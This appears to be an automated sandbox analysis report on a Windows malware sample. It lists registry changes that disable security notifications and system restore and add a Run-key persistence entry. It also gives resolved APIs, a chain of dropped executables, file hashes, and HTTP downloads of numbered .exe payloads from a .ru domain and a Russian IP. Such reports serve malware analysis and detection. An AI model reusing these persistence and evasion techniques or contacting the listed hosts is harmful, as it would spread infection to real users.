HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore\
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\SystemRestore\DisableSR
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoProxyDetectType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASAPI32\EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASAPI32\FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASAPI32\EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASAPI32\ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASAPI32\MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASAPI32\FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASMANCS\EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASMANCS\FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASMANCS\EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASMANCS\ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASMANCS\MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASMANCS\FileDirectory
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\ProgramData
HKEY_USERS\S-1-5-21-120665959-548228820-2376508522-1001\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-120665959-548228820-2376508522-1001
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-120665959-548228820-2376508522-1001\ProfileImagePath
HKEY_CURRENT_USER\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings
HKEY_CURRENT_USER\Software\Microsoft\windows\CurrentVersion\Internet Settings\Wpad
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadLastNetwork
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-GB
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-GB
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesOverride
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AutoUpdateDisableNotify
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\SystemRestore\DisableSR
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoProxyDetectType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASAPI32\EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASAPI32\FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASAPI32\EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASAPI32\ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASAPI32\MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASAPI32\FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASMANCS\EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASMANCS\FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASMANCS\EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASMANCS\ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASMANCS\MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\winsvcs_RASMANCS\FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\ProgramData
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-120665959-548228820-2376508522-1001\ProfileImagePath
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-GB
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-GB
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft Windows Services
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft Windows Services
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesOverride
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AutoUpdateDisableNotify
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\SystemRestore\DisableSR
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadLastNetwork

Resolved APIs

kernel32.dll.FlsAlloc
kernel32.dll.FlsGetValue
kernel32.dll.FlsSetValue
kernel32.dll.FlsFree
kernel32.dll.Module32FirstW
kernel32.dll.LoadLibraryA
kernel32.dll.VirtualAlloc
kernel32.dll.VirtualProtect
kernel32.dll.VirtualFree
kernel32.dll.GetVersionExA
kernel32.dll.TerminateProcess
kernel32.dll.ExitProcess
kernel32.dll.SetErrorMode
msvcrt.dll._controlfp
msvcrt.dll._except_handler3
msvcrt.dll.__set_app_type
msvcrt.dll.isalpha
msvcrt.dll.__p__fmode
msvcrt.dll.__p__commode
msvcrt.dll._adjust_fdiv
msvcrt.dll.__setusermatherr
msvcrt.dll._initterm
msvcrt.dll.__getmainargs
msvcrt.dll._acmdln
msvcrt.dll.exit
msvcrt.dll._XcptFilter
msvcrt.dll._exit
msvcrt.dll._snprintf
msvcrt.dll.wcsstr
msvcrt.dll.srand
msvcrt.dll.rand
msvcrt.dll._snwprintf
msvcrt.dll.isdigit
msvcrt.dll.memset
msvcrt.dll.memcpy
wininet.dll.InternetOpenUrlA
wininet.dll.HttpQueryInfoA
wininet.dll.InternetCloseHandle
wininet.dll.InternetReadFile
wininet.dll.InternetOpenUrlW
wininet.dll.InternetOpenW
wininet.dll.InternetOpenA
urlmon.dll.URLDownloadToFileW
shlwapi.dll.PathFileExistsW
shlwapi.dll.PathFindFileNameA
kernel32.dll.GetModuleFileNameW
kernel32.dll.GetFileAttributesW
kernel32.dll.CopyFileW
kernel32.dll.CreateDirectoryW
kernel32.dll.GetLogicalDriveStringsW
kernel32.dll.GetDriveTypeW
kernel32.dll.FindFirstFileW
kernel32.dll.FindClose
kernel32.dll.DeleteFileW
kernel32.dll.CloseHandle
kernel32.dll.WriteFile
kernel32.dll.GetTickCount
kernel32.dll.GlobalUnlock
kernel32.dll.ExitThread
kernel32.dll.Sleep
kernel32.dll.GlobalAlloc
kernel32.dll.GlobalLock
kernel32.dll.FindNextFileW
kernel32.dll.SetFileAttributesW
kernel32.dll.GetVolumeInformationW
kernel32.dll.CreateProcessW
kernel32.dll.ExpandEnvironmentStringsW
kernel32.dll.CreateFileW
kernel32.dll.GetStartupInfoA
kernel32.dll.GetModuleHandleA
kernel32.dll.CreateThread
kernel32.dll.CreateMutexA
kernel32.dll.GetLastError
user32.dll.OpenClipboard
user32.dll.EmptyClipboard
user32.dll.GetClipboardData
user32.dll.CloseClipboard
user32.dll.SetClipboardData
advapi32.dll.RegQueryValueExW
advapi32.dll.RegOpenKeyExW
advapi32.dll.RegCloseKey
advapi32.dll.RegSetValueExW
advapi32.dll.RegCreateKeyExA
shell32.dll.ShellExecuteW
ole32.dll.CoInitialize
ole32.dll.CoCreateInstance
rasapi32.dll.RasConnectionNotificationW
sechost.dll.NotifyServiceStatusChangeA
cryptbase.dll.SystemFunction036
ole32.dll.CoInitializeEx
advapi32.dll.RegDeleteTreeA
advapi32.dll.RegDeleteTreeW
iphlpapi.dll.GetAdaptersAddresses
dhcpcsvc.dll.DhcpRequestParams
ole32.dll.CoUninitialize
oleaut32.dll.#500
kernel32.dll.CreateToolhelp32Snapshot
kernel32.dll.SortGetHandle
kernel32.dll.SortCloseHandle

Executed Commands

C:\Windows\495060393034060\winsvcs.exe
C:\Users\user\AppData\Local\Temp\3895820593.exe
C:\Users\user\AppData\Local\Temp\3180725230.exe
C:\Windows\806084767800850\winsvcs.exe
C:\Users\user\AppData\Local\Temp\1015321578.exe
C:\Users\user\AppData\Local\Temp\1498839355.exe

Mutexes

596030303050
IESQMMUTEX_0_208
650870850508

PE Information

Image Base 0x00400000
Entry Point 0x0040612b
Reported Checksum 0x00030a82
Actual Checksum 0x00030a82
Minimum OS Version 5.1
Compile Time 2017-10-14 21:00:54
Import Hash c07e3df57b355727f548e05ac8faa5e9
Exported DLL Name \x8e\x01LookupPrivilegeNameA (garbled: the export directory's name RVA lands inside the import name table; see Exports below)

Sections

Name Virtual Address Virtual Size Size of Raw Data Characteristics Entropy
.text 0x00001000 0x00013dae 0x00013e00 IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ 6.56
.rdata 0x00015000 0x00004300 0x00004400 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ 5.28
.data 0x0001a000 0x0000bf68 0x00009600 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE 5.02
.rsrc 0x00026000 0x00001828 0x00001a00 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ 4.93
.reloc 0x00028000 0x00001cac 0x00001e00 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ 4.69

Imports

Library KERNEL32.dll:
0x415028 TerminateThread
0x41502c TerminateProcess
0x415030 SetComputerNameExW
0x415034 GetLastError
0x415038 GetProcAddress
0x415040 SetCommMask
0x415048 VirtualProtect
0x415050 DuplicateHandle
0x415054 LoadLibraryW
0x415058 CloseHandle
0x415060 GetThreadTimes
0x415064 lstrcpyA
0x41506c CreateFileA
0x415070 GetLocaleInfoW
0x415074 LoadLibraryA
0x415078 GlobalAlloc
0x41507c GetProcessTimes
0x415080 EnumTimeFormatsA
0x415084 GetDriveTypeA
0x415088 EscapeCommFunction
0x41508c GetModuleHandleW
0x415090 GetCommProperties
0x415094 GetCurrentProcess
0x4150a0 ExitProcess
0x4150a4 FlushFileBuffers
0x4150a8 WriteConsoleW
0x4150ac GetConsoleOutputCP
0x4150b0 WriteConsoleA
0x4150bc Sleep
0x4150d0 HeapFree
0x4150dc IsDebuggerPresent
0x4150e0 GetCommandLineA
0x4150e4 GetStartupInfoA
0x4150e8 RtlUnwind
0x4150ec RaiseException
0x4150f0 LCMapStringA
0x4150f4 WideCharToMultiByte
0x4150f8 MultiByteToWideChar
0x4150fc LCMapStringW
0x415100 GetCPInfo
0x415104 HeapAlloc
0x415108 HeapCreate
0x41510c VirtualFree
0x415110 VirtualAlloc
0x415114 HeapReAlloc
0x415118 TlsGetValue
0x41511c TlsAlloc
0x415120 TlsSetValue
0x415124 TlsFree
0x415128 SetLastError
0x41512c GetCurrentThreadId
0x415130 ReadFile
0x415134 WriteFile
0x415138 GetConsoleCP
0x41513c GetConsoleMode
0x415140 GetStdHandle
0x415144 GetModuleFileNameA
0x415158 SetHandleCount
0x41515c GetFileType
0x415164 GetTickCount
0x415168 GetCurrentProcessId
0x415170 HeapSize
0x415174 GetACP
0x415178 GetOEMCP
0x41517c IsValidCodePage
0x415180 GetUserDefaultLCID
0x415184 GetLocaleInfoA
0x415188 EnumSystemLocalesA
0x41518c IsValidLocale
0x415190 GetStringTypeA
0x415194 GetStringTypeW
0x41519c SetFilePointer
0x4151a0 SetStdHandle
Library USER32.dll:
0x4151b0 GetScrollRange
0x4151b4 GetPropW
0x4151b8 PostMessageW
0x4151bc GetFocus
0x4151c0 SetScrollRange
Library GDI32.dll:
0x41501c EndPath
0x415020 FillPath
Library ADVAPI32.dll:
0x415004 GetUserNameA
Library MSIMG32.dll:
0x4151a8 TransparentBlt
Library WINHTTP.dll:
0x4151c8 WinHttpOpen
0x4151cc WinHttpCloseHandle

Exports

Ordinal Address Name
(not decodable) The parser emitted 378 consecutive ordinals, 101678 to 102055, with no names and "addresses" such as 0x74a97275, 0x6ca42e32 and 0x48006c that lie far beyond the roughly 0x2a000 bytes the section table maps. Read as little-endian bytes, consecutive entries spell fragments of the import-name strings with every third byte altered: 0x33874d49, 0x6ca42e32, 0x48006c give "IM?3", "2.?l", "l" (MSIMG32.dll), and the next five entries give WinHttpCloseHandle the same way. The export data directory therefore points into the import name table rather than at a real export table, which also accounts for the garbled Exported DLL Name above.

Strings

.text
`.rdata
@.data
.rsrc
@.reloc
YQPVh
uQh\RA
GWh TA
QW@Ph
;5POB
t hxcA
t$h8\A
;5@OB
Yh$RA
9=,?B
FVh TA
;5POB
;=@OB
SVWUj
95d3B
95d3B
bad allocation
string too long
invalid string position
Unknown exception
LC_TIME
LC_NUMERIC
LC_MONETARY
LC_CTYPE
LC_COLLATE
LC_ALL
EncodePointer
DecodePointer
FlsFree
FlsSetValue
FlsGetValue
FlsAlloc
(null)
`h````
CorExitProcess
runtime error
Microsoft Visual C++ Runtime Library
<program name unknown>
Program:
bad exception
HH:mm:ss
dddd, MMMM dd, yyyy
MM/dd/yy
December
November
October
September
August
April
March
February
January
Saturday
Friday
Thursday
Wednesday
Tuesday
Monday
Sunday
united-states
united-kingdom
trinidad & tobago
south-korea
south-africa
south korea
south africa
slovak
puerto-rico
pr-china
pr china
new-zealand
hong-kong
holland
great britain
england
czech
china
britain
america
swiss
swedish-finland
spanish-venezuela
spanish-uruguay
spanish-puerto rico
spanish-peru
spanish-paraguay
spanish-panama
spanish-nicaragua
spanish-modern
spanish-mexican
spanish-honduras
spanish-guatemala
spanish-el salvador
spanish-ecuador
spanish-dominican republic
spanish-costa rica
spanish-colombia
spanish-chile
spanish-bolivia
spanish-argentina
portuguese-brazilian
norwegian-nynorsk
norwegian-bokmal
norwegian
italian-swiss
irish-english
german-swiss
german-luxembourg
german-lichtenstein
german-austrian
french-swiss
french-luxembourg
french-canadian
french-belgian
english-usa
english-us
english-uk
english-trinidad y tobago
english-south africa
english-nz
english-jamaica
english-ire
english-caribbean
english-can
english-belize
english-aus
english-american
dutch-belgian
chinese-traditional
chinese-singapore
chinese-simplified
chinese-hongkong
chinese
canadian
belgian
australian
american-english
american english
american
Norwegian-Nynorsk
Complete Object Locator'
Class Hierarchy Descriptor'
Base Class Array'
Base Class Descriptor at (
Type Descriptor'
`local static thread guard'
`managed vector copy constructor iterator'
`vector vbase copy constructor iterator'
`vector copy constructor iterator'
`dynamic atexit destructor for '
`dynamic initializer for '
`eh vector vbase copy constructor iterator'
`eh vector copy constructor iterator'
`managed vector destructor iterator'
`managed vector constructor iterator'
`placement delete[] closure'
`placement delete closure'
`omni callsig'
delete[]
new[]
`local vftable constructor closure'
`local vftable'
`RTTI
`udt returning'
`copy constructor closure'
`eh vector vbase constructor iterator'
`eh vector destructor iterator'
`eh vector constructor iterator'
`virtual displacement map'
`vector vbase constructor iterator'
`vector destructor iterator'
`vector constructor iterator'
`scalar deleting destructor'
`default constructor closure'
`vector deleting destructor'
`vbase destructor'
`string'
`local static guard'
`typeof'
`vcall'
`vbtable'
`vftable'
operator
delete
__unaligned
__restrict
__ptr64
__clrcall
__fastcall
__thiscall
__stdcall
__pascal
__cdecl
__based(
GetProcessWindowStation
GetUserObjectInformationA
GetLastActivePopup
GetActiveWindow
MessageBoxA
USER32.DLL
SunMonTueWedThuFriSat
JanFebMarAprMayJunJulAugSepOctNovDec
CONOUT$
bad allocation
VirtualAlloc
Module32FirstW
zedoxirivixavizozesafacanemafi
kernel
ios_base::badbit set
ios_base::failbit set
ios_base::eofbit set
vector<T> too long
bad cast
ExitProcess
SetConsoleTextAttribute
GetCurrentProcess
GetCommProperties
GetModuleHandleW
EscapeCommFunction
EnumTimeFormatsA
GetDriveTypeA
GetProcessTimes
GlobalAlloc
LoadLibraryW
TerminateThread
TerminateProcess
SetComputerNameExW
GetLastError
GetProcAddress
SetProcessWorkingSetSize
SetCommMask
GetProcessAffinityMask
VirtualProtect
CreateToolhelp32Snapshot
DuplicateHandle
SetProcessShutdownParameters
CloseHandle
GetFileInformationByHandle
GetThreadTimes
lstrcpyA
LocalFileTimeToFileTime
KERNEL32.dll
GetPropW
GetScrollRange
SetScrollRange
GetFocus
PostMessageW
USER32.dll
FillPath
EndPath
GDI32.dll
SetSecurityDescriptorControl
LookupPrivilegeNameA
GetSecurityDescriptorControl
GetUserNameA
InitiateSystemShutdownW
GetSecurityDescriptorDacl
ADVAPI32.dll
TransparentBlt
MSIMG32.dll
WinHttpCloseHandle
WinHttpOpen
WINHTTP.dll
InterlockedIncrement
InterlockedDecrement
Sleep
InitializeCriticalSection
DeleteCriticalSection
EnterCriticalSection
LeaveCriticalSection
HeapFree
UnhandledExceptionFilter
SetUnhandledExceptionFilter
IsDebuggerPresent
GetCommandLineA
GetStartupInfoA
RtlUnwind
RaiseException
LCMapStringA
WideCharToMultiByte
MultiByteToWideChar
LCMapStringW
GetCPInfo
HeapAlloc
HeapCreate
VirtualFree
VirtualAlloc
HeapReAlloc
TlsGetValue
TlsAlloc
TlsSetValue
TlsFree
SetLastError
GetCurrentThreadId
ReadFile
WriteFile
GetConsoleCP
GetConsoleMode
GetStdHandle
GetModuleFileNameA
FreeEnvironmentStringsA
GetEnvironmentStrings
FreeEnvironmentStringsW
GetEnvironmentStringsW
SetHandleCount
GetFileType
QueryPerformanceCounter
GetTickCount
GetCurrentProcessId
GetSystemTimeAsFileTime
HeapSize
GetACP
GetOEMCP
IsValidCodePage
GetUserDefaultLCID
GetLocaleInfoA
EnumSystemLocalesA
IsValidLocale
GetStringTypeA
GetStringTypeW
InitializeCriticalSectionAndSpinCount
SetFilePointer
SetStdHandle
WriteConsoleA
GetConsoleOutputCP
WriteConsoleW
FlushFileBuffers
LoadLibraryA
GetLocaleInfoW
CreateFileA
.?AV_Locimp@locale@std@@
.?AVout_of_range@std@@
Copyright (c) 1992-2004 by P.J. Plauger, licensed by Dinkumware, Ltd. ALL RIGHTS RESERVED.
.?AVtype_info@@
.?AVbad_exception@std@@
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
.?AV?$ctype@D@std@@
.?AUctype_base@std@@
.?AVfacet@locale@std@@
.?AV?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@
.?AV?$basic_stringbuf@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@
.?AV?$basic_iostream@DU?$char_traits@D@std@@@std@@
.?AV?$basic_ostream@DU?$char_traits@D@std@@@std@@
.?AV?$basic_istream@DU?$char_traits@D@std@@@std@@
.?AV?$basic_streambuf@DU?$char_traits@D@std@@@std@@
.?AV?$basic_ios@DU?$char_traits@D@std@@@std@@
.?AV?$_Iosb@H@std@@
.?AVios_base@std@@
zacesilotamomoxi
detavu gosugugozebejegikivejoxegafu
.?AVruntime_error@std@@
.?AVexception@std@@
.?AVlogic_error@std@@
.?AVfailure@ios_base@std@@
.?AVlength_error@std@@
.?AVbad_cast@std@@
.?AVbad_alloc@std@@
KERNEL32.DLL
(null)
mscoree.dll
kernel32.dll
hulonexesodamerureladu padocatuzumuruyajehu zikafupodecigosasetidiyojeyu xamilodedonekutiguyiloyojimi
VS_VERSION_INFO
StringFileInfo
457aa56b
InternalName
xesifun.exe
ProductVersion
5.8.1.75
VarFileInfo
Translation
This file is not on VirusTotal.

Process Tree


BdTTBslVE5X4r.exe, PID: 2952, Parent PID: 2480
Full Path: C:\Users\user\AppData\Local\Temp\BdTTBslVE5X4r.exe
Command Line: "C:\Users\user\AppData\Local\Temp\BdTTBslVE5X4r.exe"
winsvcs.exe, PID: 2908, Parent PID: 2952
Full Path: C:\Windows\495060393034060\winsvcs.exe
Command Line: C:\Windows\495060393034060\winsvcs.exe
3895820593.exe, PID: 2776, Parent PID: 2908
Full Path: C:\Users\user\AppData\Local\Temp\3895820593.exe
Command Line: C:\Users\user\AppData\Local\Temp\3895820593.exe
winsvcs.exe, PID: 3068, Parent PID: 2776
Full Path: C:\Windows\806084767800850\winsvcs.exe
Command Line: C:\Windows\806084767800850\winsvcs.exe
3971618177.exe, PID: 2936, Parent PID: 3068
Full Path: C:\Users\user\AppData\Local\Temp\3971618177.exe
Command Line: C:\Users\user\AppData\Local\Temp\3971618177.exe
winsvcs.exe, PID: 2744, Parent PID: 2936
Full Path: C:\Windows\806084767800850\winsvcs.exe
Command Line: C:\Windows\806084767800850\winsvcs.exe
1015321578.exe, PID: 2612, Parent PID: 2744
Full Path: C:\Users\user\AppData\Local\Temp\1015321578.exe
Command Line: C:\Users\user\AppData\Local\Temp\1015321578.exe

Hosts

Direct IP Country Name
N 92.63.197.48 Russian Federation
Y 8.8.8.8 United States

TCP

Source Source Port Destination Destination Port
192.168.35.21 49170 92.63.197.48 slpsrgpsrhojifdij.ru 80
192.168.35.21 49171 92.63.197.48 slpsrgpsrhojifdij.ru 80
192.168.35.21 49172 92.63.197.48 slpsrgpsrhojifdij.ru 80
192.168.35.21 49173 92.63.197.48 slpsrgpsrhojifdij.ru 80
192.168.35.21 49179 92.63.197.48 slpsrgpsrhojifdij.ru 80
192.168.35.21 49180 92.63.197.48 slpsrgpsrhojifdij.ru 80
192.168.35.21 49186 92.63.197.48 slpsrgpsrhojifdij.ru 80
192.168.35.21 49188 92.63.197.48 slpsrgpsrhojifdij.ru 80
192.168.35.21 49199 92.63.197.48 slpsrgpsrhojifdij.ru 80
192.168.35.21 49205 92.63.197.48 slpsrgpsrhojifdij.ru 80
192.168.35.21 49206 92.63.197.48 slpsrgpsrhojifdij.ru 80

UDP

Source Source Port Destination Destination Port

DNS

Name Response Post-Analysis Lookup
slpsrgpsrhojifdij.ru A 92.63.197.48
osheoufhusheoghuesd.ru NXDOMAIN

HTTP Requests

URI Data
http://slpsrgpsrhojifdij.ru/1.exe
GET /1.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
Host: slpsrgpsrhojifdij.ru

http://slpsrgpsrhojifdij.ru/2.exe
GET /2.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
Host: slpsrgpsrhojifdij.ru

http://slpsrgpsrhojifdij.ru/3.exe
GET /3.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
Host: slpsrgpsrhojifdij.ru

http://slpsrgpsrhojifdij.ru/4.exe
GET /4.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
Host: slpsrgpsrhojifdij.ru

http://slpsrgpsrhojifdij.ru/5.exe
GET /5.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
Host: slpsrgpsrhojifdij.ru

http://92.63.197.48/1.exe
GET /1.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
Host: 92.63.197.48

http://92.63.197.48/2.exe
GET /2.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
Host: 92.63.197.48

http://92.63.197.48/3.exe
GET /3.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
Host: 92.63.197.48

http://92.63.197.48/4.exe
GET /4.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
Host: 92.63.197.48

http://92.63.197.48/5.exe
GET /5.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
Host: 92.63.197.48

SMTP traffic

No SMTP traffic performed.

IRC traffic

No IRC requests performed.

ICMP traffic

No ICMP traffic performed.

CIF Results

No CIF Results

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Suricata HTTP

No Suricata HTTP

Sorry! No dropped Suricata Extracted files.

JA3

No JA3 hashes found.

File name winsvcs.exe
Associated Filenames
C:\Windows\495060393034060\winsvcs.exe
File Size 152576 bytes
File Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 44a81be517e01ab33abdba541a239b6e
SHA1 2890c3be34e4189fe0a11b4e60ff2b3203fcdd2a
SHA256 056b7eb0c06645e1f51ed77f4fa18a4bed47135108371a84f0482f141ae0d769
CRC32 3328869D
Ssdeep 3072:MupWc+2g2yM2BSwgtNSGv551zDb/Wvn006luxHE:MupxMcBDSGlzDbuvn00c
ClamAV None
Yara None matched
CAPE Yara None matched
File name 3180725230.exe
Associated Filenames
C:\Users\user\AppData\Local\Temp\3180725230.exe
C:\Users\user\AppData\Local\Temp\3344735343.exe
C:\Users\user\AppData\Local\Temp\1498839355.exe
File Size 519 bytes
File Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 2910f240138e190e7909b166df3698dc
SHA1 3c4ce87d71fe2ff5c5482017317105d516a8f8e0
SHA256 a4cff3dfa592efc374054229cef177964b410a8b51646aee5e2a44c6c946e2c3
CRC32 736321C4
Ssdeep 6:idqmVg3F+X32QdGRcOkctC6h1p+21/Jt/nSeUyp+El:eNGSGQdG2T6h1saJ1SeUyn
ClamAV None
Yara None matched
CAPE Yara None matched
File name 3895820593.exe
Associated Filenames
C:\Users\user\AppData\Local\Temp\3895820593.exe
C:\Users\user\AppData\Local\Temp\3971618177.exe
C:\Users\user\AppData\Local\Temp\1015321578.exe
File Size 519 bytes
File Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 1c2cd2dbb035e97cd38f9c51ce6e6b40
